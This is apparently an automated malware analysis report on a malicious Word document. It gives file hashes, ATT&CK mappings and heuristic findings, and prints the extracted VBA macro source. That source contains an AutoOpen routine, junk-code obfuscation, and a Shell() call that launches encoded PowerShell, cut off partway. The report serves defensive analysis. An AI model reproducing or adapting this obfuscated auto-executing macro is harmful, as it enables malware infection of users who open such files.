Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebf030cd38a70fa4…

MALICIOUS

Office (OLE)

Size: 102.0 KB
Created: 2018-06-12 08:11:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 71e5a857e5f1688919c93997afa9dbcb
SHA-1: 82a9233b555f48a6933f00fded2abf80b15ad8bf
SHA-256: ebf030cd38a70fa41a826b7088087b52efdd4407c4be970dc45ab8faef76abfa
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic)
T1204.002 (User Execution: Malicious File)

The sample contains legacy WordBasic auto-execution markers and a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within the VBA macros. The Autoopen subroutine is present and calls RLOSTYCk, which in turn executes a command constructed from obfuscated strings. This strongly suggests the document is designed to download and execute a secondary payload.

Heuristics (6)

  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11683 bytes
SHA-256: cf5791460f470b4d9237f9444c4a54e67841f639d2059310f243a6d494138630
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kNIYNGPZtq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RLOSTYCk()
On Error Resume Next
IBMHS = Tan(60832)
sXriO = MdFHv
oATBw = CDbl(fPrmt)
KWRrcF = sKLAzR
wssrT = Hex(ZKADpA * ChrW(DmQiG + Int(PYszUA * Rnd(99217)) * DPczT * Log(69338 * HnXATD - AVOCc + Fix(51))))
uFuduV = Tan(3899)
EuYqTh = Tan(42439)
XEVQWw = thnbMX
jRYIO = CDbl(UzEwiK)
szJzV = FwJhLU
GAvHup = Hex(iLGRL * ChrW(YaYzX + Int(MtFuXn * Rnd(9649)) * SXZkNn * Log(30673 * UDzDsA - hssnD + Fix(51))))
iaKKd = Tan(16413)
RLOSTYCk = ilcsXDnju + Shell(rvUAG + Chr(XKWGUm + vbKeyP + ENSGhHNc) + "owers" + JadGjFdJdij + EizGo + XRCNmBJF + NrYUMCBiddw + ziHVi, 78079 - 78079)
BGXTp = Tan(17162)
KmWEYC = GUCTpM
YBfAB = CDbl(nzOZj)
LpNfiN = IJuWoP
aYFIq = Hex(wicFsT * ChrW(kDNXwU + Int(rssoYG * Rnd(11212)) * Pdfrk * Log(2195 * OrGjwi - NHnKZz + Fix(51))))
wXZTW = Tan(17912)
End Function
Sub Autoopen()
On Error Resume Next
fRkkhs = Tan(28822)
ZAimmo = RNYKK
lBNjGw = CDbl(GGXOr)
jaWwO = ROhmbm
QbGLv = Hex(wDuQW * ChrW(buvsT + Int(UvWFuu * Rnd(28329)) * VsQDO * Log(71957 * thrAuc - tMoKz + Fix(51))))
nuVWOJ = Tan(14336)
RLOSTYCk
pLjLzl = Tan(80828)
nrBlK = NErZAR
KRkvU = CDbl(aXtoE)
BDWKpw = MnYwIN
GhRioI = Hex(pfuwPd * ChrW(PitCw + Int(IdrtC * Rnd(55125)) * EOlUb * Log(64746 * PtFPAv - MYbOZT + Fix(51))))
zEfuLG = Tan(52430)
End Sub


Attribute VB_Name = "pXcLwlbtZUh"
Function JadGjFdJdij()
On Error Resume Next
AKHRj = Tan(43218)
cwdRZw = dwwVz
jiRqd = CDbl(AVXwY)
vqYzlJ = EAbjow
wGrmnH = Hex(FVVtQn * ChrW(WUEBF + Int(dIziK * Rnd(78937)) * uPEvdr * Log(76324 * udlJQ - pUCFV + Fix(51))))
PhjWi = Tan(66949)
jYfkO = "HeLL -e IAAoA" + "G4AZQBXAC0ATwBi" + "AGoAZQBDAH" + "QAIABJAE" + "8ALg" + "BjAG8ATQBQAHIA" + "ZQBzAFMASQBv"
MoINbw = Tan(49251)
qRaQYA = cqTso
oouYp = CDbl(SMjiN)
NbalPJ = qHzCc
wVGFpD = Hex(tNXAOp * ChrW(iGkHiN + Int(KYiqa * Rnd(18334)) * wJolRi * Log(84980 * MGtfXA - DaXaW + Fix(51))))
kWsUPT = Tan(73218)
iHWZmjnfXFk = "AG4ALgBEA" + "GUARgBsAGEAVA" + "BFAFMAVABSA" + "EUAQQBNACgAWwBz" + "AFkAcwB0AEUAbQ"
XPOtIv = Tan(8718)
PwGuju = NDpVKU
TAmAO = CDbl(wQCPGB)
rflPEv = KbUcA
tiQazb = Hex(PwOGHh * ChrW(mwuqo + Int(FliSaQ * Rnd(28666)) * zsfKAY * Log(85808 * AcSiZ - vRiHX + Fix(51))))
iMhinV = Tan(69945)
jdKzAJvVhi = "AuAEkATw" + "AuAG0AZQ" + "BNAG8AUgBZAFMA" + "VAByAGUAYQBNAF0" + "AWwBDAG8AbgBW"
wwzjM = Tan(53879)
EiwGI = VwRYK
fqQoS = CDbl(lRlLBX)
okUCcl = zHrii
ODMOP = Hex(dQERj * ChrW(hnaKj + Int(hYbUoA * Rnd(92600)) * msHYwi * Log(11470 * fiFXw - uOjTor + Fix(51))))
wrnbwB = Tan(17780)
hjpJmYh = "AGUAUgB" + "UAF0AOgA6AGYAUg" + "BPAE0AQgBhAF" + "MARQA2ADQ" + "AUwBUAHIAaQBOAG" + "cAKAAnAFYAWgBCA" + "GIAYQ" + "A4AEoAQ"
tOLRZT = Tan(71844)
jSzEQ = sEJzm
MlVMEu = CDbl(BTwAhw)
lTtFWb = FDAqn
qwiSBO = Hex(NIszNi * ChrW(kpjSQH + Int(WZLEa * Rnd(20820)) * GiVVQ * Log(30160 * CliwSS - datrrv + Fix(51))))
QThaj = Tan(10793)
jqdqwI = "QBFAEkAWAA" + "vAH" + "kAagA0AE" + "UAawBsAEQAZ" + "ABLAEMA" + "bwB0AGgAbwBLAHQ" + "AbAA1" + "AGQAVwBx" + "AG" + "EAUQBY"
YXNaE = Tan(15763)
aXizP = hEETzp
twRMiP = CDbl(qOnukK)
iNQXOK = DDPuc
qLOOd = Hex(JaZFAs * ChrW(KQLjjN + Int(EDqnv * Rnd(67726)) * apvCSF * Log(3490 * izZRt - CEIPf + Fix(51))))
zFrUj = Tan(63511)
pupCaOMbzIZ = "AEsAZwBYAFoA" + "YgBNAF" + "oAawBkAG" + "QAMQBkAE4AbABQ" + "AGoAQgBmA" + "DkANwB0ADI" + "AcQBGAHY" + "AZwB6AE" + "0Abg"
InVaS = Tan(88107)
ikiDi = nDlMJR
EBwhY = CDbl(JfVwb)
litTJ = HXjRR
Fhsmw = Hex(iKONT * ChrW(onCCk + Int(NmDhwE * Rnd(88216)) * boCtnm * Log(69121 * cqXXi - TQGYO + Fix(51))))
iWVFnA = Tan(8086)
OFwivwoiq = "BPADgA" + "dwBaADgAWQByADk" + "Abg" + "BMAEU" + "AeQBEAD" + "EAUgB" + "VAE4AVgAxAHU" + "AZwBTAE8AeAB" + "EAEsAVgA2A"
WXlosM = Tan(84819)
IVahWP = MfNwM
mbXpH = CDbl(FSzFn)
EDFFii = JdIlw
PPMIaa = Hex(rNjwN * ChrW(lHmXLP + Int(zSMEHw * Rnd(66976)) * DpipZI * Log(84117 *
... (truncated)